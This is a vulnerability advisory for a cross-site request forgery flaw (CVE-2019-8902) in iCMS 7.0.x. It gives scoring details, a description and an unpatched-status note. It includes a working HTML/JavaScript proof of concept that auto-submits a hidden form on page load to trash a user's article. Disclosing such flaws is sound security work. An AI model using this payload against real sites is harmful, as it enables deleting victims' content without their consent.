#VU21270 Cross-site request forgery in iCMS


Published: 2019-09-23

Vulnerability identifier: #VU21270

Vulnerability risk: Low

CVSSv3.1: 6.2 [CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N/E:U/RL:U/RC:C]

CVE-ID: CVE-2019-8902

CWE-ID: CWE-352

Exploitation vector: Network

Exploit availability: No

Vulnerable software:
iCMS
Web applications / CMS

Vendor: iCMS

Description

The vulnerability allows a remote attacker to perform cross-site request forgery attacks.

The vulnerability exists due to insufficient validation of the HTTP request origin. A remote authenticated attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website, such as delete users' articles via the "public/api.php?app=user" URI.

PoC:

<html>
<body>
	<script type="text/javascript">

		var x = document.cookie;
		alert(x);

		function post(url,fields)
	{
		var p = document.createElement("form");
		p.action = url;
		p.innerHTML = fields;
		p.target = "_self";
		p.method = "post";
		document.body.appendChild(p);
		p.submit();
	}
		function csrf_hack()
	{
		var fields;
		fields += "<input type='hidden' name='id' value='1'>";
		fields += "<input type='hidden' name='act' value='trash'>";
		fields += "<input type='hidden' name='pg' value='article'>";
		fields += "<input type='hidden' name='action' value='manage'>";
		var url = "http://localhost/iCMS-7.0/public/api.php?app=user";
		post(url,fields);
	}
		window.onload = function() { csrf_hack();}
	</script>
</body>
</html>

Mitigation
Cybersecurity Help is currently unaware of any official solution to address this vulnerability.

Vulnerable software versions

iCMS: 7.0.0 - 7.0.15


External links
http://github.com/idreamsoft/iCMS/issues/56


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.


Latest bulletins with this vulnerability